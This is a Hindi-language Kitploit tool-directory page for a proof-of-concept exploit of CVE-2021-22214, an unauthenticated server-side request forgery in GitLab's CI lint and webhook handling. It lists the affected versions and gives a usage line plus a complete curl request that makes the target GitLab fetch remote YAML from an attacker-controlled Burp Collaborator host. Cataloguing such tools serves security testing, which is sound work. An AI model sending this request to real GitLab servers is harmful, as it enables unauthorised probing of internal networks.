Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
GitLab-SSRF-CVE-2021-22214 — CVE-2021-22214 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो GitLab वेबहुक में सर्वर-साइड रिक्वेस्ट फोर्जरी है, जो बिना प्रमाणीकरण के हमलावरों को आंतरिक HTTP अनुरोध करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षा
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

CVE-2021-22214 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो GitLab वेबहुक में सर्वर-साइड रिक्वेस्ट फोर्जरी है, जो बिना प्रमाणीकरण के हमलावरों को आंतरिक HTTP अनुरोध करने की अनुमति देता है।

रिपॉजिटरी देखें
वेबसाइट
314 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22214

CVE-2021-22214 के लिए POC: Gitlab SSRF

विवरण

रिमोट GitLab इंस्टॉलेशन में वेबहुक के लिए आंतरिक नेटवर्क सक्षम होने के परिणामस्वरूप सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता शामिल है। एक रिमोट, अनप्रमाणित हमलावर पंजीकरण-सीमित GitLab इंस्टेंस का शोषण कर सकता है, जिससे यह हमलावर की पसंद के किसी भी डोमेन पर HTTP अनुरोध कर सकता है।

उपयोग

  • पायथन कोड

    root@kitploit:~
    usage:   python3 GitLab_SSRF.py <target> <burp_collaborator_url>
    
  • कर्ल कमांड

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

प्रभावित संस्करण

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

संदर्भ

  • GitLab SSRF (CVE-2021-22214)
  • tenable.com
टूल डाउनलोड करें